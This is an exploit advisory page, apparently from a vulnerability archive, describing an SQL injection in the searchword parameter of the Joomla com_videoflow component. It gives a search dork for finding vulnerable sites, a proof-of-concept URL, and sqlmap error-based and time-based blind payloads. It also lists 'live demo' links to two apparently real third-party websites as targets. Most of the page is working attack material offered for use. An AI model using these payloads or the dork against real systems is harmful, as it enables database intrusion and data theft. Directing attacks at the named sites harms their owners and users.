Joomla com_videoflow SQL injection Vulnerability

2016.08.04
mr xBADGIRL21 (MR) mr
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

###################### # ____ _ ____ ____ ___ ____ _ ____ _ # __ _| __ ) / | _ / ___|_ _| _ | | |___ / | # / / _ / _ | | | | | _ | || |_) | | __) | | # > <| |_) / ___ | |_| | |_| || || _ <| |___ / __/| | # /_/_____/_/ _____/ ____|___|_| ______|_____|_| # ###################### # Exploit Title : Joomla com_videoflow SQL injection Vulnerability # Exploit Author : xBADGIRL21 # Dork : inurl:index.php?option=com_videoflow # Vendor Homepage : http://www.fidsoft.com # version : 1.1.3 - 1.1.5 # Tested on: [ BACK BOX] # skype:xbadgirl21 # Date: 04/08/2016 # video Proof : https://www.youtube.com/watch?v=o16dZdO-Q9U ###################### # [+] DESCRIPTION : ###################### # [+] VideoFlow is a multimedia system for Joomla! and Facebook that makes sharing multimedia content across # [+] the two platforms a breeze. Visit www.videoflow.tv for more information, support and demos. # [+] AND an SQL injection been Detected in this Joomla components videoflow after you add ['] to # [+] Vuln Target Parameter you will get error like : # [!] You have an error in your SQL syntax; check the manual that corresponds to your MySQL # [!] server version for the right syntax to use near ''' at line 1 SQL=SELECT ###################### # [+] Poc : ###################### # [searchword] Get Parameter Vulnerable To SQLi # http://127.0.0.1/index.php?option=com_videoflow&task=search&vs=1&searchword=1' ###################### # [+] SQLmap PoC: ###################### # --- #Parameter: searchword (GET) # Type: error-based # Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause # Payload: option=com_videoflow&task=search&vs=1&searchword=1') AND (SELECT 9107 FROM(SELECT COUNT(*),CONCAT(0x71716a7171,(SELECT #(ELT(9107=9107,1))),0x71787a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ('fDLe'='fDLe # Type: AND/OR time-based blind # Title: MySQL >= 5.0.12 AND time-based blind (SELECT) # Payload: option=com_videoflow&task=search&vs=1&searchword=1') AND (SELECT * FROM (SELECT(SLEEP(5)))ImsR) AND ('yKcO'='yKcO # ###################### # [!] Live Demo : ###################### # http://egyptshortcuts.com/amrmabrouk/index.php?option=com_videoflow&task=search&vs=1&searchword=1 # http://www.misitimi.gr/index.php?option=com_videoflow&task=search&vs=1&searchword=1 ###################### # Discovered by : xBADGIRL21 # Greetz : All Mauritanien Hackers - NoWhere ######################

References:

https://www.youtube.com/watch?v=o16dZdO-Q9U


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top